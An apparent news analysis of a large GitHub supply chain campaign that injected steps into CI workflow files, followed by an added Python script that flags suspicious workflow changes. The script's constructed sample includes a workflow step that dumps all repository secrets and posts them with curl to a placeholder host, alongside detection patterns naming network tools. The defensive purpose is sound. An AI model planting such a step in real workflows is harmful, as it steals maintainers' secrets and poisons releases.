A coordinated hacking campaign has poisoned over 5,700 GitHub repositories in just six hours, marking one of the most aggressive supply chain attacks on open source infrastructure to date. The operation, dubbed Megalodon, used automation to inject malicious code into thousands of projects while masquerading as routine CI/CD maintenance.

According to security researchers at SafeDep, the attackers used throwaway accounts with innocent-looking names like "build-bot," "auto-ci," "ci-bot," and "pipeline-bot." Their commit messages, "ci: add build optimization step" or "chore: optimize pipeline runtime," were deliberately designed to blend into the background noise that developers encounter daily in continuous integration workflows.

Here's what makes this attack genuinely concerning: it didn't exploit a zero-day vulnerability. It exploited trust. The malicious commits looked exactly like the automated maintenance updates that modern development workflows generate by the hundreds. To a developer skimming pull requests, they would appear completely routine.

The scale is what sets this apart from previous supply chain attacks. 5,561 repositories compromised in six hours implies industrial-level automation. This wasn't a handful of researchers testing a proof of concept. It was a coordinated operation with infrastructure behind it.

The technical method targeted CI workflow files, the YAML configurations under .github/workflows/ that tell GitHub Actions what to do when code changes. By injecting steps into these workflows, the attackers could execute arbitrary code whenever the repository's automated builds ran. Any step in a job can read the job's GITHUB_TOKEN and reference the repository's secrets through the secrets context, so an injected step can read signing keys and deployment credentials; and because it runs inside the same pipeline that produces releases, it can alter the artifacts that downstream users then install.

What the press release doesn't say is often more important than what it does. We don't yet know what payload was delivered, who was targeted, or whether this was reconnaissance for a larger operation. The attackers' operational security appears strong: throwaway accounts, forged commit authors, plausible commit messages. Forging an author is trivial, since Git's author field is free text; unless a repository requires signed commits and verifies them, nothing ties that name to a real account.

This attack exposes a structural vulnerability in how we build software. Open source depends on trust: trust that contributors are who they claim to be, trust that CI systems are configured correctly, trust that repository maintainers will catch malicious changes. At the scale modern software operates, that trust model is breaking.

The technology to detect this exists: anomaly detection in commit patterns, verification of contributor identities, automated scanning of CI configuration changes. But most projects don't have the resources to implement these safeguards. The economics of open source mean that critical infrastructure often runs on volunteer labor and hope.

The Wired investigation attributes this campaign to a group called TeamPCP, which has been conducting supply chain attacks at increasing scale. This isn't their first operation, but it's their largest.

For developers, the lesson is clear: automated CI commits deserve the same scrutiny as any other code change. Concretely, that means treating .github/workflows/ as protected code (CODEOWNERS plus required review), pinning third-party actions to full commit SHAs rather than tags, keeping the default GITHUB_TOKEN permissions read-only, and holding publishing credentials in environments that require approval. For the industry, it's a wake-up call that our development infrastructure needs security to be a first-class concern, not an afterthought. When attackers can compromise nearly 6,000 repositories in an afternoon, we're not dealing with individual security failures. We're dealing with systemic architectural risk.
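Two passages above are easier to reason about with something concrete: the description of how an injected workflow step reaches secrets, and the claim that automated scanning of CI configuration changes is feasible. The script below is an added example written for this article; it is not SafeDep's detection logic, not Wired's reporting, and not anything recovered from the Megalodon campaign (the article notes the payload is not public). The sample workflow, the "optimize pipeline runtime" step it appends, the commit author names and messages, and the cache.example.invalid hostname are all constructed for illustration. It diffs a workflow file before and after a commit, flags added lines that put secrets in scope, reach the network, pipe to a shell, or pull an action by a mutable tag, and then treats a commit that merely looks like bot maintenance as a reason for more review rather than less.

```python
"""Added example: triage for maintenance-looking commits that touch CI config.

Illustrative code written for this article, not SafeDep's detector or anything
from the Megalodon campaign. Workflow text, the injected step, commit metadata
and the hostname are constructed. Lines are matched with regexes rather than a
YAML parser so the script has no third-party dependencies; a real deployment
would parse the YAML as well.
"""
import difflib
import re

# Indicators of a step that can move secrets off the runner. A legitimate
# "optimize pipeline" step rarely needs a secret in scope, network egress,
# and an obfuscated or piped-to-shell command all at once.
INDICATORS = [
    ("secret-in-scope", re.compile(r"\$\{\{\s*(secrets\.\w+|toJSON\(\s*secrets\s*\))")),
    ("network-egress", re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(ba|z)?sh\b")),
    ("encoded-command", re.compile(r"base64\s+(-d|--decode)|\beval\b|\\x[0-9a-fA-F]{2}")),
]
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*([^@\s]+)@(\S+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
# Author-name tokens and message prefixes the article reports the campaign used.
BOT_NAME = re.compile(r"(?:^|[-_\s])(bot|ci|pipeline|build)(?:[-_\s]|$)", re.I)
MAINTENANCE_MSG = re.compile(r"^(ci|chore|build)(\([^)]*\))?:", re.I)


def added_lines(before: str, after: str) -> list[str]:
    """Lines present in `after` but not in `before` (a line-level diff)."""
    diff = difflib.ndiff(before.splitlines(), after.splitlines())
    return [ln[2:] for ln in diff if ln.startswith("+ ")]


def scan_added_lines(lines: list[str]) -> list[tuple[str, str]]:
    """Return (indicator, line) pairs for every suspicious added line."""
    findings = []
    for ln in lines:
        for label, pat in INDICATORS:
            if pat.search(ln):
                findings.append((label, ln.strip()))
        m = USES_LINE.match(ln)
        # A tag or branch (v4, main) can be moved by whoever controls the
        # action; only a full commit SHA pins what actually runs.
        if m and not FULL_SHA.match(m.group(2)):
            findings.append(("unpinned-action", ln.strip()))
    return findings


def scan_workflow_change(before: str, after: str) -> list[tuple[str, str]]:
    """Scan only what the commit added; pre-existing lines are out of scope."""
    return scan_added_lines(added_lines(before, after))


def maintenance_shaped_ci_commit(author: str, message: str, paths: list[str]) -> bool:
    """True for a commit that looks like routine automation and edits a workflow."""
    touches_ci = any(p.startswith(".github/workflows/") for p in paths)
    looks_automated = bool(BOT_NAME.search(author)) or bool(MAINTENANCE_MSG.match(message))
    return touches_ci and looks_automated


def triage(author, message, paths, before, after):
    """'block' if the change carries exfiltration indicators, 'review' if it
    merely looks like bot maintenance of CI config, otherwise 'ok'."""
    findings = scan_workflow_change(before, after)
    if findings:
        return "block", findings
    if maintenance_shaped_ci_commit(author, message, paths):
        return "review", []
    return "ok", []


# Constructed sample: a plain Node CI workflow, then the same file with one
# innocuous-looking step appended that posts every repository secret to a host
# the attacker controls (example.invalid is a reserved, non-resolving domain).
BEFORE = """\
name: CI
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
"""
AFTER = BEFORE + """\
      - name: Optimize pipeline runtime
        env:
          CI_CONTEXT: ${{ toJSON(secrets) }}
        run: curl -fsS -X POST https://cache.example.invalid/warm -d "$CI_CONTEXT"
"""

if __name__ == "__main__":
    verdict, findings = triage(
        "build-bot", "ci: add build optimization step",
        [".github/workflows/ci.yml"], BEFORE, AFTER,
    )
    print(verdict)
    for label, line in findings:
        print(f"  {label}: {line}")
```

Run against the constructed commit, the verdict is "block": the appended step puts the entire secrets context into an environment variable and then ships it out with curl. The same author and message with no workflow change still come back "review", which is the operational point: a bot-shaped commit to .github/workflows/ is exactly the camouflage this campaign relied on, so it should route to a human rather than auto-merge. Scanning only added lines keeps noise down on existing workflows, but it also means a pre-existing unpinned action is not reported; a periodic full scan covers that.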